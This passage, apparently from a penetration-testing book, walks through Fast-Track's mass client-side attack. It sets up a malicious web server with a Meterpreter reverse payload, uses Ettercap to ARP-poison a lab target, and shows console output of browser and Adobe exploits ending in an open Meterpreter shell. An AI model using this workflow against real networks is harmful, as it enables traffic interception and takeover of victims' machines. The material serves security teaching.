The mass client-side attack is similar to the Browser Autopwn function; however, this attack includes additional exploits and built-in features that can incorporate ARP cache and DNS poisoning on the target’s machine, and additional browser exploits not included in Metasploit.
When a user connects to your web server, Fast-Track will fire off every exploit in its arsenal as well as those in the Metasploit Framework. If the user’s machine is susceptible to a specific vulnerability within one of these libraries, the attacker will obtain full access to the target machine.
Enter the number:4
. . . SNIP . . .
Enter the IP Address you want the web server to listen on:10.211.55.130
Specify your payload: 1. Windows Meterpreter Reverse Meterpreter 2. Generic Bind Shell 3. Windows VNC Inject Reverse_TCP (aka "Da Gui") 4. Reverse TCP Shell Enter the number of the payload you want:1
After selecting option 4, Mass Client-Side Attack
, from the main menu, tell Fast-Track what IP address the web server should listen on , and then choose a payload .
Next, decide whether to use Ettercap to ARP-poison your target machine. Ettercap will intercept all requests that the target makes and redirect them to your malicious server. After confirming that you want to use Ettercap at , enter the IP address of the target you want to poison . Fast-Track will then go ahead and set up Ettercap for you.
Would you like to use Ettercap to ARP poison a host yes or no:yes
. . . SNIP . . .
What IP Address do you want to poison:10.211.55.128
Setting up the ettercap filters.... Filter created... Compiling Ettercap filter.... . . SNIP . . .
Filter compiled...Running Ettercap and poisoning target...
Once a client connects to your malicious server, Metasploit fires exploits at the target. In the following listing, you can see that the Adobe exploit is successful, and a Meterpreter shell is waiting .
You could use ARP cache poisoning within this attack, but it will only work when you are on the same local and unrestricted subnet as the target.
[*] Local IP: http://10.211.55.130:8071/ [*] Server started. [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Exploit running as background job. [*] Using URL: http://0.0.0.0:8072/ [*] Local IP: http://10.211.55.130:8072/ [*] Server started. msf exploit(zenturiprogramchecker_unsafe) > [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Using URL: http://0.0.0.0:8073/ [*] Local IP: http://10.211.55.130:8073/ [*] Server started. [*] Sending Adobe Collab.getIcon() Buffer Overflow to 10.211.55.128:1044... [*] Attempting to exploit ani_loadimage_chunksize [*] Sending HTML page to 10.211.55.128:1047... [*] Sending Adobe JBIG2Decode Memory Corruption Exploit to 10.211.55.128:1046... [*] Sending exploit to 10.211.55.128:1049... [*] Attempting to exploit ani_loadimage_chunksize [*] Sending Windows ANI LoadAniIcon() Chunk Size Stack Overflow (HTTP) to 10.211.55.128:1076... [*] Transmitting intermediate stager for over-sized stage...(216 bytes) [*] Sending stage (718336 bytes) [*] Meterpreter session 1 opened (10.211.55.130:9007 -> 10.211.55.128:1077 msf exploit(zenturiprogramchecker_unsafe) > sessions -l Active sessions =============== Id Description Tunnel -- ----------- ------ 1 Meterpreter 10.211.55.130:9007 -> 10.211.55.128:1077 msf exploit(zenturiprogramchecker_unsafe) > sessions -i 1 [*] Starting interaction with 1... meterpreter >